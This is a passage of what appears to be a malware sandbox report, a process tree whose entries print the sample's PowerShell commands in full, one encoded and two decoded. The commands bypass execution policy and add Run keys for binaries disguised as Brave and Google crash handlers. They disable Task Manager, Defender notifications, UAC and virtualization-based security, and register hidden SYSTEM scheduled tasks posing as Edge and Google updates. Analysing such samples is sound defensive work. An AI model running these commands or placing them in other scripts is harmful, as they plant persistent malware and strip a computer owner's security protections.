                                                                                                                                                                                                                                  powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAcgB1AG4ARQBuAHQAcgBpAGUAcwAgAD0AIABAACgACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgB9ACwACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIAfQAsAAoAIAAgACAAIABAAHsATgBhAG0AZQA9ACIARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgB9ACwACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAfQAsAAoAIAAgACAAIABAAHsATgBhAG0AZQA9ACIAUwBoAGUASQBsAEUAeABwAGUAcgBpAGUAbgBjAGUASABvAHMAdAAiADsAIABWAGEAbAB1AGUAPQAiACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAFMAaABlAEkAbABFAHgAcABlAHIAaQBlAG4AYwBlAEgAbwBzAHQALgBlAHgAZQAiAH0ACgApAAoACgBmAG8AcgBlAGEAYwBoACAAKAAkAGUAbgB0AHIAeQAgAGkAbgAgACQAcgB1AG4ARQBuAHQAcgBpAGUAcwApACAAewAKACAAIAAgACAATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACQAZQBuAHQAcgB5AC4ATgBhAG0AZQAgAC0AVgBhAGwAdQBlACAAJABlAG4AdAByAHkALgBWAGEAbAB1AGUAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKACAAIAAgACAAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACQAZQBuAHQAcgB5AC4ATgBhAG0AZQAgAC0AVgBhAGwAdQBlACAAJABlAG4AdAByAHkALgBWAGEAbAB1AGUAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAJABlAG4AdAByAHkALgBOAGEAbQBlACAALQBWAGEAbAB1AGUAIAAkAGUAbgB0AHIAeQAuAFYAYQBsAHUAZQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAIAAgACAAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAJABlAG4AdAByAHkALgBOAGEAbQBlACAALQBWAGEAbAB1AGUAIAAkAGUAbgB0AHIAeQAuAFYAYQBsAHUAZQAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgB9AAoA
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                  PID:5152
                                                                                                                                                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                                    "C:\Windows\system32\chcp.com" 65001
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                      PID:5560
                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    powershell.exe -exec bypass -enc c h c p   6 5 0 0 1 
 $ P r o g r e s s P r e f e r e n c e   =   ' S i l e n t l y C o n t i n u e ' 
 
 S e t - E x e c u t i o n P o l i c y   - S c o p e   C u r r e n t U s e r   B y p a s s   - F o r c e 
 S e t - E x e c u t i o n P o l i c y   - S c o p e   L o c a l M a c h i n e   B y p a s s   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P u s h N o t i f i c a t i o n s "   - N a m e   " T o a s t E n a b l e d "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   0   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P u s h N o t i f i c a t i o n s "   - N a m e   " T o a s t E n a b l e d "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P u s h N o t i f i c a t i o n s "   - N a m e   " T o a s t E n a b l e d "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   0   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P u s h N o t i f i c a t i o n s "   - N a m e   " T o a s t E n a b l e d "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 
 N e w - I t e m   - P a t h   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ "   - N a m e   " G r a p h i c s D r i v e r s "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ G r a p h i c s D r i v e r s "   - N a m e   " H w S c h M o d e "   - P r o p e r t y T y p e   D W O R D   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ G r a p h i c s D r i v e r s "   - N a m e   " H w S c h M o d e "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 N e w - I t e m   - P a t h   " H K C U : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ "   - N a m e   " G r a p h i c s D r i v e r s "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ G r a p h i c s D r i v e r s "   - N a m e   " H w S c h M o d e "   - P r o p e r t y T y p e   D W O R D   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ G r a p h i c s D r i v e r s "   - N a m e   " H w S c h M o d e "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 
 N e w - I t e m   - P a t h   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s "   - N a m e   " S y s t e m "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ S y s t e m "   - N a m e   " D i s a b l e T a s k M g r "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ S y s t e m "   - N a m e   " D i s a b l e T a s k M g r "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 N e w - I t e m   - P a t h   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s "   - N a m e   " S y s t e m "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ S y s t e m "   - N a m e   " D i s a b l e T a s k M g r "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ S y s t e m "   - N a m e   " D i s a b l e T a s k M g r "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 
 N e w - I t e m   - P a t h   " H K L M : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s "   - N a m e   " E x p l o r e r "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ E x p l o r e r "   - N a m e   " D i s a b l e N o t i f i c a t i o n C e n t e r "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ E x p l o r e r "   - N a m e   " D i s a b l e N o t i f i c a t i o n C e n t e r "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 N e w - I t e m   - P a t h   " H K C U : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s "   - N a m e   " E x p l o r e r "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ E x p l o r e r "   - N a m e   " D i s a b l e N o t i f i c a t i o n C e n t e r "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ E x p l o r e r "   - N a m e   " D i s a b l e N o t i f i c a t i o n C e n t e r "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 
 N e w - I t e m   - P a t h   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r "   - N a m e   " N o t i f i c a t i o n s "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s "   - N a m e   " D i s a b l e E n h a n c e d N o t i f i c a t i o n s "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s "   - N a m e   " D i s a b l e E n h a n c e d N o t i f i c a t i o n s "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 N e w - I t e m   - P a t h   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r "   - N a m e   " N o t i f i c a t i o n s "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s "   - N a m e   " D i s a b l e E n h a n c e d N o t i f i c a t i o n s "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s "   - N a m e   " D i s a b l e E n h a n c e d N o t i f i c a t i o n s "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 
 N e w - I t e m   - P a t h   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r "   - N a m e   " N o t i f i c a t i o n s "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s "   - N a m e   " D i s a b l e N o t i f i c a t i o n s "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s "   - N a m e   " D i s a b l e N o t i f i c a t i o n s "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 N e w - I t e m   - P a t h   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r "   - N a m e   " N o t i f i c a t i o n s "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s "   - N a m e   " D i s a b l e N o t i f i c a t i o n s "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s "   - N a m e   " D i s a b l e N o t i f i c a t i o n s "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ S y s t e m "   - N a m e   " E n a b l e L U A "   - P r o p e r t y T y p e   D W o r d   - V a l u e   0   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ S y s t e m "   - N a m e   " E n a b l e L U A "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ S y s t e m "   - N a m e   " E n a b l e L U A "   - P r o p e r t y T y p e   D W o r d   - V a l u e   0   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ S y s t e m "   - N a m e   " E n a b l e L U A "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ D a t a   C o l l e c t i o n "   - N a m e   " A l l o w T e l e m e t r y "   - V a l u e   1   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ D a t a   C o l l e c t i o n "   - N a m e   " A l l o w T e l e m e t r y "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ D a t a   C o l l e c t i o n "   - N a m e   " A l l o w T e l e m e t r y "   - V a l u e   1   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ D a t a   C o l l e c t i o n "   - N a m e   " A l l o w T e l e m e t r y "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ W i n d o w s   S e a r c h "   - N a m e   " A l l o w C o r t a n a "   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ W i n d o w s   S e a r c h "   - N a m e   " A l l o w C o r t a n a "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ W i n d o w s   S e a r c h "   - N a m e   " A l l o w C o r t a n a "   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ W i n d o w s   S e a r c h "   - N a m e   " A l l o w C o r t a n a "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ D e v i c e G u a r d "   - N a m e   " E n a b l e V i r t u a l i z a t i o n B a s e d S e c u r i t y "   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ D e v i c e G u a r d "   - N a m e   " E n a b l e V i r t u a l i z a t i o n B a s e d S e c u r i t y "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ D e v i c e G u a r d "   - N a m e   " E n a b l e V i r t u a l i z a t i o n B a s e d S e c u r i t y "   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ D e v i c e G u a r d "   - N a m e   " E n a b l e V i r t u a l i z a t i o n B a s e d S e c u r i t y "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ D e v i c e G u a r d "   - N a m e   " R e q u i r e P l a t f o r m S e c u r i t y F e a t u r e s "   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ D e v i c e G u a r d "   - N a m e   " R e q u i r e P l a t f o r m S e c u r i t y F e a t u r e s "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ D e v i c e G u a r d "   - N a m e   " R e q u i r e P l a t f o r m S e c u r i t y F e a t u r e s "   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ D e v i c e G u a r d "   - N a m e   " R e q u i r e P l a t f o r m S e c u r i t y F e a t u r e s "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ S e s s i o n   M a n a g e r \ M e m o r y   M a n a g e m e n t "   - N a m e   " L a r g e P a g e M i n i m u m "   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ S e s s i o n   M a n a g e r \ M e m o r y   M a n a g e m e n t "   - N a m e   " L a r g e P a g e M i n i m u m "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ S e s s i o n   M a n a g e r \ M e m o r y   M a n a g e m e n t "   - N a m e   " L a r g e P a g e M i n i m u m "   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ S e s s i o n   M a n a g e r \ M e m o r y   M a n a g e m e n t "   - N a m e   " L a r g e P a g e M i n i m u m "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                    • Modifies Windows Defender notification settings
                                                                                                                                                                                                                                    • UAC bypass
                                                                                                                                                                                                                                    PID:4780
                                                                                                                                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                                      "C:\Windows\system32\chcp.com" 65001
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                        PID:4192
                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      powershell.exe -exec bypass -enc c h c p   6 5 0 0 1 
 $ P r o g r e s s P r e f e r e n c e   =   ' S i l e n t l y C o n t i n u e ' 
 
 S e t - E x e c u t i o n P o l i c y   - S c o p e   C u r r e n t U s e r   B y p a s s   - F o r c e 
 S e t - E x e c u t i o n P o l i c y   - S c o p e   L o c a l M a c h i n e   B y p a s s   - F o r c e 
 
 $ a c t i o n   =   N e w - S c h e d u l e d T a s k A c t i o n   - E x e c u t e   " B r a v e C r a s h H a n d l e r . e x e "   - W o r k i n g D i r e c t o r y   " $ e n v : P R O G R A M D A T A \ B r a v e C r a s h H a n d l e r . e x e " ; 
 $ t r i g g e r D a i l y   =   N e w - S c h e d u l e d T a s k T r i g g e r   - D a i l y   - A t   " 0 0 : 0 0 " ; 
 $ t r i g g e r L o g o n   =   N e w - S c h e d u l e d T a s k T r i g g e r   - A t L o g O n ; 
 $ s e t t i n g s   =   N e w - S c h e d u l e d T a s k S e t t i n g s S e t   - A l l o w S t a r t I f O n B a t t e r i e s   - S t a r t W h e n A v a i l a b l e   - H i d d e n   - D o n t S t o p I f G o i n g O n B a t t e r i e s   - E x e c u t i o n T i m e L i m i t   0 ; 
 R e g i s t e r - S c h e d u l e d T a s k   - T a s k N a m e   " M i c r o s o f t E d g e U p d a t e T a s k M a c h i n e C o r e { B 8 A C 1 6 6 8 - 9 7 D 2 - 4 2 D B - 9 4 D B - D 3 2 D E 5 0 5 8 8 A 1 } "   - A c t i o n   $ a c t i o n   - T r i g g e r   $ t r i g g e r D a i l y ,   $ t r i g g e r L o g o n   - S e t t i n g s   $ s e t t i n g s   - R u n L e v e l   H i g h e s t   - U s e r   " S Y S T E M " 
 
 $ a c t i o n   =   N e w - S c h e d u l e d T a s k A c t i o n   - E x e c u t e   " G o o g l e C r a s h H a n d l e r . e x e "   - W o r k i n g D i r e c t o r y   " $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r . e x e " ; 
 $ t r i g g e r D a i l y   =   N e w - S c h e d u l e d T a s k T r i g g e r   - D a i l y   - A t   " 0 0 : 0 0 " ; 
 $ t r i g g e r L o g o n   =   N e w - S c h e d u l e d T a s k T r i g g e r   - A t L o g O n ; 
 $ s e t t i n g s   =   N e w - S c h e d u l e d T a s k S e t t i n g s S e t   - A l l o w S t a r t I f O n B a t t e r i e s   - S t a r t W h e n A v a i l a b l e   - H i d d e n   - D o n t S t o p I f G o i n g O n B a t t e r i e s   - E x e c u t i o n T i m e L i m i t   0 ; 
 R e g i s t e r - S c h e d u l e d T a s k   - T a s k N a m e   " G o o g l e U p d a t e T a s k "   - A c t i o n   $ a c t i o n   - T r i g g e r   $ t r i g g e r D a i l y ,   $ t r i g g e r L o g o n   - S e t t i n g s   $ s e t t i n g s   - R u n L e v e l   H i g h e s t   - U s e r   " S Y S T E M " 
 
 $ a c t i o n   =   N e w - S c h e d u l e d T a s k A c t i o n   - E x e c u t e   " G o o g l e C r a s h H a n d l e r 6 4 . e x e "   - W o r k i n g D i r e c t o r y   " $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r 6 4 . e x e " ; 
 $ t r i g g e r D a i l y   =   N e w - S c h e d u l e d T a s k T r i g g e r   - D a i l y   - A t   " 0 0 : 0 0 " ; 
 $ t r i g g e r L o g o n   =   N e w - S c h e d u l e d T a s k T r i g g e r   - A t L o g O n ; 
 $ s e t t i n g s   =   N e w - S c h e d u l e d T a s k S e t t i n g s S e t   - A l l o w S t a r t I f O n B a t t e r i e s   - S t a r t W h e n A v a i l a b l e   - H i d d e n   - D o n t S t o p I f G o i n g O n B a t t e r i e s   - E x e c u t i o n T i m e L i m i t   0 ; 
 R e g i s t e r - S c h e d u l e d T a s k   - T a s k N a m e   " G o o g l e U p d a t e T a s k S y s t e m _ 1 D 9 4 6 5 0 _ X M 7 T "   - A c t i o n   $ a c t i o n   - T r i g g e r   $ t r i g g e r D a i l y ,   $ t r i g g e r L o g o n   - S e t t i n g s   $ s e t t i n g s   - R u n L e v e l   H i g h e s t   - U s e r   " S Y S T E M " 
 
 $ a c t i o n   =   N e w - S c h e d u l e d T a s k A c t i o n   - E x e c u t e   " E m b e d i t . e x e "   - W o r k i n g D i r e c t o r y   " $ e n v : U S E R P R O F I L E \ E m b e d i t . e x e " ; 
 $ t r i g g e r D a i l y   =   N e w - S c h e d u l e d T a s k T r i g g e r   - D a i l y   - A t   " 0 0 : 0 0 " ; 
 $ t r i g g e r L o g o n   =   N e w - S c h e d u l e d T a s k T r i g g e r   - A t L o g O n ; 
 $ s e t t i n g s   =   N e w - S c h e d u l e d T a s k S e t t i n g s S e t   - A l l o w S t a r t I f O n B a t t e r i e s   - S t a r t W h e n A v a i l a b l e   - H i d d e n   - D o n t S t o p I f G o i n g O n B a t t e r i e s   - E x e c u t i o n T i m e L i m i t   0 ; 
 R e g i s t e r - S c h e d u l e d T a s k   - T a s k N a m e   " N v T m R e p _ C r a s h R e p o r t _ D 2 E F 1 8 3 8 6 C 7 D C 4 6 C "   - A c t i o n   $ a c t i o n   - T r i g g e r   $ t r i g g e r D a i l y ,   $ t r i g g e r L o g o n   - S e t t i n g s   $ s e t t i n g s   - R u n L e v e l   H i g h e s t   - U s e r   " S Y S T E M " 
 
 $ a c t i o n   =   N e w - S c h e d u l e d T a s k A c t i o n   - E x e c u t e   " S h e I l E x p e r i e n c e H o s t . e x e "   - W o r k i n g D i r e c t o r y   " $ e n v : L O C A L A P P D A T A \ S h e I l E x p e r i e n c e H o s t . e x e " ; 
 $ t r i g g e r D a i l y   =   N e w - S c h e d u l e d T a s k T r i g g e r   - D a i l y   - A t   " 0 0 : 0 0 " ; 
 $ t r i g g e r L o g o n   =   N e w - S c h e d u l e d T a s k T r i g g e r   - A t L o g O n ; 
 $ s e t t i n g s   =   N e w - S c h e d u l e d T a s k S e t t i n g s S e t   - A l l o w S t a r t I f O n B a t t e r i e s   - S t a r t W h e n A v a i l a b l e   - H i d d e n   - D o n t S t o p I f G o i n g O n B a t t e r i e s   - E x e c u t i o n T i m e L i m i t   0 ; 
